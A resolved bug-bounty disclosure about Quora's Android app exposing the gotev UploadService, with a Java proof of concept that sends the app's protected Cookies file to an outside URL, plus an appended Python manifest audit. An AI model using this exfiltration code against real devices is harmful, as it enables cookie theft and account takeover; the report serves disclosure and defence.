[Quora Android] Possible to steal arbitrary files from mobile device
Medium
Quora
Reported by
bagipro
Vulnerability Details
Technical details and impact analysis
**Summary:**
The service
```xml
<service android:enabled="true" android:exported="true" android:name="net.gotev.uploadservice.UploadService"/>
```
is enabled and exported. If it's exported, it means that any third-party application can access it and send arbitrary data into it.
The following code sends the main database file to an arbitrary server (I used http://google.com/zaheck):
```java
UploadTaskParameters params = new UploadTaskParameters();
params.setId("1337");
params.setServerUrl("http://google.com/zaheck");
try {
    params.addFile(new UploadFile("/data/data/com.quora.android/app_webview/Cookies"));
} catch (FileNotFoundException e) {
    throw new IllegalStateException(e); /* should never be thrown because not checked on the client side */
}
Intent intent = new Intent("net.gotev.uploadservice.action.upload");
intent.setClassName("com.quora.android", "net.gotev.uploadservice.UploadService");
intent.putExtra("taskClass", "net.gotev.uploadservice.MultipartUploadTask");
intent.putExtra("multipartUtf8Charset", true);
intent.putExtra("httpTaskParameters", new HttpUploadTaskParameters());
intent.putExtra("taskParameters", params);
startService(intent);
```
As a result, the protected file `/data/data/com.quora.android/app_webview/Cookies`, which is not accessible to any application besides yours, is sent to the attacker. It's a really serious vulnerability which allows account takeover. It can be used by any third-party application installed on the same device. On the newest Android versions it can also be exploited via Instant Apps directly from a web browser (installation of an app is not required).
**Description (Include Impact):**
I believe it's not your vulnerability, but one in the gotev library you use. Anyway, an attacker can steal files with settings and cookies (even httpOnly, it doesn't matter); the Google authorization token is stored in a shared_prefs file, which can also be stolen.
PoC:
{F211064}
This file contains sensitive cookies
{F211066}
### Steps To Reproduce
I attached an APK file which sends `/data/data/com.quora.android/app_webview/Cookies` to http://google.com/zaheck
Install the APK and open it; the file with all cookies will be sent automatically to the attacker-provided URL.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Information Disclosure
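
An added example, not part of the original report or of the gotev library: a manifest audit that flags services, receivers and activities reachable by other apps without a permission, which is the condition the report describes. It assumes a decoded text `AndroidManifest.xml` (for instance as produced by apktool); the sample manifest, the `com.example.app` names and the function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Content providers have different export defaults and read/write permissions; not covered here.
COMPONENTS = ("activity", "activity-alias", "service", "receiver")

# Constructed sample: the <service> line from the report plus three contrasting entries.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application>
    <service android:enabled="true" android:exported="true" android:name="net.gotev.uploadservice.UploadService"/>
    <service android:name=".SyncService" android:exported="true" android:permission="com.example.app.permission.SYNC"/>
    <service android:name=".InternalService" android:exported="false"/>
    <receiver android:name=".BootReceiver"><intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>
  </application>
</manifest>"""

def _attr(el, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return el.get("{%s}%s" % (ANDROID_NS, name))

def unprotected_exported_components(manifest_xml):
    """Return (tag, name, reason) for components other apps can reach without a permission."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        return []
    app_permission = _attr(app, "permission")  # default applied to all components
    findings = []
    for el in app:
        if el.tag not in COMPONENTS or _attr(el, "enabled") == "false":
            continue
        exported = _attr(el, "exported")
        if exported == "true":
            reason = "explicitly exported"
        elif exported is None and el.find("intent-filter") is not None:
            # Before Android 12 (targetSdk 31) an intent-filter implied exported="true".
            reason = "implicitly exported via intent-filter"
        else:
            continue
        if _attr(el, "permission") or app_permission:
            continue  # callers must hold a permission; its protectionLevel is not checked
        findings.append((el.tag, _attr(el, "name"), reason))
    return findings

if __name__ == "__main__":
    for tag, name, reason in unprotected_exported_components(SAMPLE_MANIFEST):
        print(f"{tag} {name}: {reason}, no permission required")
```

A component guarded by a permission is skipped, but that permission only restricts callers if its `protectionLevel` is `signature`, which this check does not verify.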